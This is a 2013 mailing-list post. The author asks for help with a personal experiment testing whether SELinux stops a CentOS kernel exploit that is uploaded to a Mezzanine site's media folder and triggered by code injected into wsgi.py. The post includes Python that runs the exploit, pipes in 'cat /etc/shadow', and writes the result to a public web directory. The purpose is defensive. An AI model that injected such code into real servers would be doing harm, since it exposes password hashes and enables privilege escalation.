[CentralOH] Help Constructing a Science Experiment

Joshua Kramer joskra42.list at gmail.com
Tue May 14 19:27:53 CEST 2013


I just read about this CentOS vulnerability:


I am trying to construct a science experiment to see if SELinux properly
mitigates this attack.  I spun up a new VM of my dev server, and I have a
website running via Apache and WSGI.  I am trying to simulate a potential
attack whereby someone uploads the exploit to the media directory of a
Mezzanine-based app, and runs it by injecting malicious code into wsgi.py.
 Far fetched, I know, but it's a science experiment after all.

The code noted below just causes the Apache thread to hang.  I don't show
any SELinux AVC denials so I don't think the executable is being run.  (But
that might not be a valid assertion, seeing that I'm testing SELinux in the
first place.)

Does anyone see any glaring issues here?


# Evil hack: This command line works when run as a non-root user:
# echo "cat /etc/shadow" |
/srv/website/www/website/static/media/semtex_exploit >

from subprocess import Popen, PIPE

cmd = '/srv/website/www/website/static/media/semtex_exploit'

p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.stdin.write("cat /etc/shadow\n")

mtext = p.stdout.read()

with open('/srv/website/www/website/static/media/shadow', 'a') as the_file:
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/centraloh/attachments/20130514/922beecb/attachment.html>

More information about the CentralOH mailing list